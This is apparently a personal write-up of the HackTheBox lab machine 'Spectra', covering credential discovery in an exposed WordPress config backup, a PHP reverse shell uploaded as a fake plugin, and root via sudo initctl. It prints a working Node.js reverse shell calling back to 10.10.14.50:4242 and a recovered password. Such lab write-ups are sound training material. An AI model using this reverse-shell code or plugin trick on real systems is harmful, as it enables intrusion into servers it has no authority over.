Spectra

I was not a fan of this box. The initial foothold was kind of alright but the user part was very CTF-like and I don't think stuff like that would exist on any real production environment. But on the root-part there was some NodeJS exploit stuff so that was kind of new atleast for me! Let's get started.

There's port 80 open and there seems to be two sites

spec-frontpage

Testing site contains something juicy information right off the bat, there's list of files on root of the page and wp-config.php.save file which contains some credentials

spectra-wp-config-save

Box also has 3306 (Usually a MySQL port) open but it also has remote logging disabled so we can't login. So next step is to check that main site.

spectra-main

There's nothing too interesting at first glance, seems to be typical wordpress site with default theme, BUT there's atleast one valid user who has posted a post. Trying to login ad administrator with password we found earlier on wp-config we get in the WP-admin panel!

On WordPress admin panel you can upload plugins and edit template-files on the system. This can be used to gain shell access to server, next step is to upload PHP-reverse shell (I used the one from pentestmonkey with some slight modifications, WordPress plugins need to have some information of the plugin on top of the file so prepend the file with following stuff:

/**
* Plugin Name: MONKEY
* Plugin URI: https://github.com/this/doesnotexist
* Description: Wordpress Monkey plugin
* Version: 1.0
* Author: bolazoo
* Author URI: https://example.com
* License: https://nolicenceforthis
*/

Also port and IP-address need to be changed according to your system. The plugin needs to be zipped, that can be done with following command:

zip -r monkey.zip monkey.php

Now all that's left to be done is to upload the monkey.zip file as a new plugin, setup netcat listener and then navigate to http://spectra.htb/main/wp-content/plugins/monkey/monkey.php and foothold is now complete!

The box contained alot of data and finding the right thing took some time, on /opt/autologin.conf.orig there's a script that set's passwords from files, one of them being /etc/autologin/passwd which contains password "SummerHereWeCome!!". There's few user on the box but the password matches with user katie.

Katie is part of "developers" group which has certain files on the system:

/srv/nodetest.js 
/etc/init/test6.conf
/etc/init/test7.conf
/etc/init/test3.conf
/etc/init/test3.conf
/etc/init/test4.conf
/etc/init/test.conf
/etc/init/test8.conf
/etc/init/test9.conf
/etc/init/test10.conf
/etc/init/test7.conf
/etc/init/test3.conf
/etc/init/test4.conf
/etc/init/test1.conf

Also katie can run a command as sudo:

katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
(ALL) SETENV: NOPASSWD: /sbin/initctl

Those conf-files all contain the same thing which basically is that on start the /srv/nodetest.js will also start. So, last step is to inject the nodetest.js file with reverse shell and then start the server with initctl. Shellcode is:

(function(){
    var net = require("net"),
    cp = require("child_process"),
    sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(4242, "10.10.14.50", function(){
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
  });
  return /a/; // Prevents the Node.js application form crashing
})();

And now all that's to be done is to setup nc listener and run the node script via initctl:

sudo /sbin/initctl start test1

And box is done! Note: if you are not on private instance youo may need to either stop the service you want to start first or then try another "testX"-services!